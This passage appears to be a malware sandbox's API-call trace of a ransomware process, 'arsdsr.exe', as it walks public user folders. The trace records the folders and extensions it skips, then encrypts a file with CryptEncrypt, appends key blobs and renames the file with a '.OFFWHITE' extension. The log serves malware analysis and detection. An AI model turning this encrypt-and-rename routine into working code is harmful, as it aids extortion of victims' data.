ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0153.690] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0153.691] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0153.691] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0153.691] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0153.691] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28351f0f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0153.691] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0153.691] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0153.691] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0153.691] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0153.691] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0153.691] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0153.691] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0153.691] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0153.691] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0153.691] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0153.691] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0153.691] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Public\\Downloads\\" | out: lpString1="C:/Users\\Public\\Downloads\\") returned="C:/Users\\Public\\Downloads\\" [0153.691] lstrcatW (in: lpString1="C:/Users\\Public\\Downloads\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\Public\\Downloads\\desktop.ini") returned="C:/Users\\Public\\Downloads\\desktop.ini" [0153.691] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.691] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.691] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0153.691] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0153.691] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0153.691] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0153.691] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0153.691] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0153.691] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0153.691] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0153.691] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28351f0f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0153.691] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0153.691] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0153.692] lstrcmpiW (lpString1="Favorites", lpString2=".") returned 1 [0153.692] lstrcmpiW (lpString1="Favorites", lpString2="..") returned 1 [0153.692] lstrcmpiW (lpString1="Favorites", lpString2="...") returned 1 [0153.692] lstrcmpiW (lpString1="Favorites", lpString2="windows") returned -1 [0153.692] lstrcmpiW (lpString1="Favorites", lpString2="$recycle.bin") returned 1 [0153.692] lstrcmpiW (lpString1="Favorites", lpString2="rsa") returned -1 [0153.692] lstrcmpiW (lpString1="Favorites", lpString2="ntuser.dat") returned -1 [0153.692] lstrcmpiW (lpString1="Favorites", lpString2="programdata") returned -1 [0153.692] lstrcmpiW (lpString1="Favorites", lpString2="appdata") returned 1 [0153.692] lstrcmpiW (lpString1="Favorites", lpString2="program files") returned -1 [0153.692] lstrcmpiW (lpString1="Favorites", lpString2="program files (x86)") returned -1 [0153.692] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Public\\" | out: lpString1="C:/Users\\Public\\") returned="C:/Users\\Public\\" [0153.692] lstrcatW (in: lpString1="C:/Users\\Public\\", lpString2="Favorites" | out: lpString1="C:/Users\\Public\\Favorites") returned="C:/Users\\Public\\Favorites" [0153.692] lstrcatW (in: lpString1="C:/Users\\Public\\Favorites", lpString2="\\" | out: lpString1="C:/Users\\Public\\Favorites\\") returned="C:/Users\\Public\\Favorites\\" [0153.692] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\Public\\Favorites\\" | out: lpString1="C:/Users\\Public\\Favorites\\") returned="C:/Users\\Public\\Favorites\\" [0153.692] lstrcatW (in: lpString1="C:/Users\\Public\\Favorites\\", lpString2="*.*" | out: lpString1="C:/Users\\Public\\Favorites\\*.*") returned="C:/Users\\Public\\Favorites\\*.*" [0153.692] FindFirstFileW (in: lpFileName="C:/Users\\Public\\Favorites\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0153.692] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0153.692] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0153.692] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0153.692] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0153.692] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 0 [0153.693] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0153.693] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0153.693] lstrcmpiW (lpString1="Libraries", lpString2=".") returned 1 [0153.693] lstrcmpiW (lpString1="Libraries", lpString2="..") returned 1 [0153.693] lstrcmpiW (lpString1="Libraries", lpString2="...") returned 1 [0153.693] lstrcmpiW (lpString1="Libraries", lpString2="windows") returned -1 [0153.693] lstrcmpiW (lpString1="Libraries", lpString2="$recycle.bin") returned 1 [0153.693] lstrcmpiW (lpString1="Libraries", lpString2="rsa") returned -1 [0153.693] lstrcmpiW (lpString1="Libraries", lpString2="ntuser.dat") returned -1 [0153.693] lstrcmpiW (lpString1="Libraries", lpString2="programdata") returned -1 [0153.693] lstrcmpiW (lpString1="Libraries", lpString2="appdata") returned 1 [0153.693] lstrcmpiW (lpString1="Libraries", lpString2="program files") returned -1 [0153.693] lstrcmpiW (lpString1="Libraries", lpString2="program files (x86)") returned -1 [0153.693] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Public\\" | out: lpString1="C:/Users\\Public\\") returned="C:/Users\\Public\\" [0153.693] lstrcatW (in: lpString1="C:/Users\\Public\\", lpString2="Libraries" | out: lpString1="C:/Users\\Public\\Libraries") returned="C:/Users\\Public\\Libraries" [0153.693] lstrcatW (in: lpString1="C:/Users\\Public\\Libraries", lpString2="\\" | out: lpString1="C:/Users\\Public\\Libraries\\") returned="C:/Users\\Public\\Libraries\\" [0153.693] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\Public\\Libraries\\" | out: lpString1="C:/Users\\Public\\Libraries\\") returned="C:/Users\\Public\\Libraries\\" [0153.693] lstrcatW (in: lpString1="C:/Users\\Public\\Libraries\\", lpString2="*.*" | out: lpString1="C:/Users\\Public\\Libraries\\*.*") returned="C:/Users\\Public\\Libraries\\*.*" [0153.693] FindFirstFileW (in: lpFileName="C:/Users\\Public\\Libraries\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0153.694] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0153.694] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0153.694] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0153.694] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0153.694] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2839e1d0, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2839e1d0, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288f9359, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x58, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0153.694] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0153.694] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0153.694] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0153.694] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0153.694] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0153.694] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0153.694] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0153.694] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0153.694] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0153.694] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0153.694] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0153.694] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Public\\Libraries\\" | out: lpString1="C:/Users\\Public\\Libraries\\") returned="C:/Users\\Public\\Libraries\\" [0153.694] lstrcatW (in: lpString1="C:/Users\\Public\\Libraries\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\Public\\Libraries\\desktop.ini") returned="C:/Users\\Public\\Libraries\\desktop.ini" [0153.694] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.694] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.694] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0153.694] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0153.694] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0153.694] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0153.695] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0153.695] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0153.695] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0153.695] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0153.695] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2837806f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x289b7a3b, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x36c, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="RecordedTV.library-ms", cAlternateFileName="RECORD~1.LIB")) returned 1 [0153.695] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2=".") returned 1 [0153.695] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="..") returned 1 [0153.695] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="...") returned 1 [0153.695] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="windows") returned -1 [0153.695] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="$recycle.bin") returned 1 [0153.695] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="rsa") returned -1 [0153.695] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="ntuser.dat") returned 1 [0153.695] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="programdata") returned 1 [0153.695] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="appdata") returned 1 [0153.695] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="program files") returned 1 [0153.695] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="program files (x86)") returned 1 [0153.695] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Public\\Libraries\\" | out: lpString1="C:/Users\\Public\\Libraries\\") returned="C:/Users\\Public\\Libraries\\" [0153.695] lstrcatW (in: lpString1="C:/Users\\Public\\Libraries\\", lpString2="RecordedTV.library-ms" | out: lpString1="C:/Users\\Public\\Libraries\\RecordedTV.library-ms") returned="C:/Users\\Public\\Libraries\\RecordedTV.library-ms" [0153.695] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.695] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.695] PathFindExtensionW (pszPath="RecordedTV.library-ms") returned=".library-ms" [0153.695] lstrcmpiW (lpString1=".library-ms", lpString2=".exe") returned 1 [0153.695] lstrcmpiW (lpString1=".library-ms", lpString2=".log") returned -1 [0153.695] lstrcmpiW (lpString1=".library-ms", lpString2=".cab") returned 1 [0153.695] lstrcmpiW (lpString1=".library-ms", lpString2=".cmd") returned 1 [0153.695] lstrcmpiW (lpString1=".library-ms", lpString2=".com") returned 1 [0153.695] lstrcmpiW (lpString1=".library-ms", lpString2=".cpl") returned 1 [0153.696] lstrcmpiW (lpString1=".library-ms", lpString2=".ini") returned 1 [0153.696] lstrcmpiW (lpString1=".library-ms", lpString2=".dll") returned 1 [0153.696] lstrcmpiW (lpString1=".library-ms", lpString2=".url") returned -1 [0153.696] lstrcmpiW (lpString1=".library-ms", lpString2=".ttf") returned -1 [0153.696] lstrcmpiW (lpString1=".library-ms", lpString2=".mp3") returned -1 [0153.696] lstrcmpiW (lpString1=".library-ms", lpString2=".pif") returned -1 [0153.696] lstrcmpiW (lpString1=".library-ms", lpString2=".mp4") returned -1 [0153.696] lstrcmpiW (lpString1=".library-ms", lpString2=".OFFWHITE") returned -1 [0153.696] lstrcmpiW (lpString1=".library-ms", lpString2=".msi") returned -1 [0153.696] lstrcmpiW (lpString1="RecordedTV.library-ms", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0153.696] GetProcessHeap () returned 0x500000 [0153.696] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x543ea8 [0153.696] CreateFileW (lpFileName="C:/Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0153.697] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=876) returned 1 [0153.697] GetProcessHeap () returned 0x500000 [0153.697] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543be0 [0153.697] GetProcessHeap () returned 0x500000 [0153.697] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543bc8 [0153.697] GetProcessHeap () returned 0x500000 [0153.697] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5663b8 [0153.697] GetProcessHeap () returned 0x500000 [0153.697] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5662b0 [0153.697] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.697] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.697] SystemFunction036 (in: RandomBuffer=0x543be0, RandomBufferLength=0x10 | out: RandomBuffer=0x543be0) returned 1 [0153.697] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.697] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.697] SystemFunction036 (in: RandomBuffer=0x543bc8, RandomBufferLength=0x10 | out: RandomBuffer=0x543bc8) returned 1 [0153.697] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.697] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.697] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5663b8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5663b8*, pdwDataLen=0x295e310*=0x100) returned 1 [0153.698] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.698] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.698] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5662b0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5662b0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0153.698] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x36c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.698] SetLastError (dwErrCode=0x0) [0153.698] WriteFile (in: hFile=0xb0, lpBuffer=0x5663b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5663b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0153.703] GetLastError () returned 0x0 [0153.703] GetLastError () returned 0x0 [0153.703] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x46c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.704] WriteFile (in: hFile=0xb0, lpBuffer=0x5662b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5662b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0153.704] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x56c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.704] WriteFile (in: hFile=0xb0, lpBuffer=0x543ea8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x543ea8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0153.704] GetProcessHeap () returned 0x500000 [0153.704] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x36c) returned 0x544200 [0153.704] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.704] ReadFile (in: hFile=0xb0, lpBuffer=0x544200, nNumberOfBytesToRead=0x36c, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x544200*, lpNumberOfBytesRead=0x295e540*=0x36c, lpOverlapped=0x0) returned 1 [0153.704] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.704] WriteFile (in: hFile=0xb0, lpBuffer=0x544200*, nNumberOfBytesToWrite=0x36c, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x544200*, lpNumberOfBytesWritten=0x295e54c*=0x36c, lpOverlapped=0x0) returned 1 [0153.704] GetProcessHeap () returned 0x500000 [0153.704] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x544200 | out: hHeap=0x500000) returned 1 [0153.704] CloseHandle (hObject=0xb0) returned 1 [0153.705] GetProcessHeap () returned 0x500000 [0153.705] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5663b8 | out: hHeap=0x500000) returned 1 [0153.705] GetProcessHeap () returned 0x500000 [0153.705] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5662b0 | out: hHeap=0x500000) returned 1 [0153.705] GetProcessHeap () returned 0x500000 [0153.705] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543be0 | out: hHeap=0x500000) returned 1 [0153.705] GetProcessHeap () returned 0x500000 [0153.705] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543bc8 | out: hHeap=0x500000) returned 1 [0153.705] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\Public\\Libraries\\RecordedTV.library-ms" | out: lpString1="C:/Users\\Public\\Libraries\\RecordedTV.library-ms") returned="C:/Users\\Public\\Libraries\\RecordedTV.library-ms" [0153.705] lstrcatW (in: lpString1="C:/Users\\Public\\Libraries\\RecordedTV.library-ms", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\Public\\Libraries\\RecordedTV.library-ms.OFFWHITE") returned="C:/Users\\Public\\Libraries\\RecordedTV.library-ms.OFFWHITE" [0153.705] MoveFileW (lpExistingFileName="C:/Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), lpNewFileName="C:/Users\\Public\\Libraries\\RecordedTV.library-ms.OFFWHITE" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.offwhite")) returned 1 [0153.717] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2837806f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x289b7a3b, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x36c, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="RecordedTV.library-ms", cAlternateFileName="RECORD~1.LIB")) returned 0 [0153.717] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0153.717] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Music", cAlternateFileName="")) returned 1 [0153.717] lstrcmpiW (lpString1="Music", lpString2=".") returned 1 [0153.717] lstrcmpiW (lpString1="Music", lpString2="..") returned 1 [0153.717] lstrcmpiW (lpString1="Music", lpString2="...") returned 1 [0153.717] lstrcmpiW (lpString1="Music", lpString2="windows") returned -1 [0153.717] lstrcmpiW (lpString1="Music", lpString2="$recycle.bin") returned 1 [0153.717] lstrcmpiW (lpString1="Music", lpString2="rsa") returned -1 [0153.717] lstrcmpiW (lpString1="Music", lpString2="ntuser.dat") returned -1 [0153.717] lstrcmpiW (lpString1="Music", lpString2="programdata") returned -1 [0153.718] lstrcmpiW (lpString1="Music", lpString2="appdata") returned 1 [0153.718] lstrcmpiW (lpString1="Music", lpString2="program files") returned -1 [0153.718] lstrcmpiW (lpString1="Music", lpString2="program files (x86)") returned -1 [0153.718] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Public\\" | out: lpString1="C:/Users\\Public\\") returned="C:/Users\\Public\\" [0153.718] lstrcatW (in: lpString1="C:/Users\\Public\\", lpString2="Music" | out: lpString1="C:/Users\\Public\\Music") returned="C:/Users\\Public\\Music" [0153.718] lstrcatW (in: lpString1="C:/Users\\Public\\Music", lpString2="\\" | out: lpString1="C:/Users\\Public\\Music\\") returned="C:/Users\\Public\\Music\\" [0153.718] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\Public\\Music\\" | out: lpString1="C:/Users\\Public\\Music\\") returned="C:/Users\\Public\\Music\\" [0153.718] lstrcatW (in: lpString1="C:/Users\\Public\\Music\\", lpString2="*.*" | out: lpString1="C:/Users\\Public\\Music\\*.*") returned="C:/Users\\Public\\Music\\*.*" [0153.718] FindFirstFileW (in: lpFileName="C:/Users\\Public\\Music\\*.*", lpFindFileData=0x295e598 | out: 